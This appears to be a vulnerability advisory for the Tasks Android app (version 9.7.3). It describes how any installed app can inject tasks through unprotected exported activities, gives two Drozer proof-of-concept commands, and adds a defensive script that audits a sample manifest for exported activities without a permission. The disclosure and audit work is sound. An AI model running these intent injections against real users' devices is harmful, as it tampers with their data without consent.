# Date: 18th of July, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
# Vendor Homepage: https://tasks.org/
# Software Link: https://github.com/tasks/tasks
# Version: 9.7.3
# Tested on: Android 9
Any application installed on a victim's phone can add arbitrary tasks to the user's task list through insecure IPC handling.
A malicious application has several ways to achieve that:
1. By sending multiple intents to the ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). The Tasks application adds the first requested "task" to the user's task list.
2. By sending an intent to the VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate the intent's origin, so any application can append tasks to the user's task list.
We used the Drozer application to emulate malicious app activity. Please find the commands below.
run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa"
run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"
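For reviewing an app for this class of issue, the following added example (not code from the advisory or from the Tasks project) audits a manifest for activities that any installed app can start without holding a permission. The embedded manifest is constructed for illustration: it reuses the two component names and actions named above, and the function name, `ProtectedActivity`, `SettingsActivity` and the permission string are assumptions.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed sample manifest, NOT the Tasks project's real AndroidManifest.xml.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="org.tasks.debug">
  <application>
    <activity android:name="com.todoroo.astrid.activity.ShareLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.PROCESS_TEXT"/>
      </intent-filter>
    </activity>
    <activity android:name="org.tasks.voice.VoiceCommandActivity" android:exported="true">
      <intent-filter>
        <action android:name="com.google.android.gm.action.AUTO_SEND"/>
      </intent-filter>
    </activity>
    <activity android:name=".ProtectedActivity" android:exported="true"
              android:permission="org.tasks.debug.permission.INTERNAL"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
  </application>
</manifest>
"""


def unprotected_exported_activities(manifest_xml):
    """Return {activity name: [actions]} for activities any app can start."""
    root = ET.fromstring(manifest_xml)
    findings = {}
    for app in root.iter("application"):
        # A permission on <application> applies to components without their own.
        app_permission = app.get(A + "permission")
        for act in app.iter("activity"):
            actions = [a.get(A + "name") for a in act.iter("action")]
            exported = act.get(A + "exported")
            # Before Android 12 (the advisory was tested on Android 9), an
            # activity with an intent-filter and no explicit android:exported
            # value is exported by default.
            is_exported = exported == "true" or (exported is None and bool(actions))
            if is_exported and not (act.get(A + "permission") or app_permission):
                findings[act.get(A + "name")] = actions
    return findings


if __name__ == "__main__":
    for name, actions in unprotected_exported_activities(SAMPLE_MANIFEST).items():
        print(name, actions)
```

Each activity reported is an entry point whose handler has to treat intent extras as untrusted input, for example by requiring user confirmation before a task is created.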

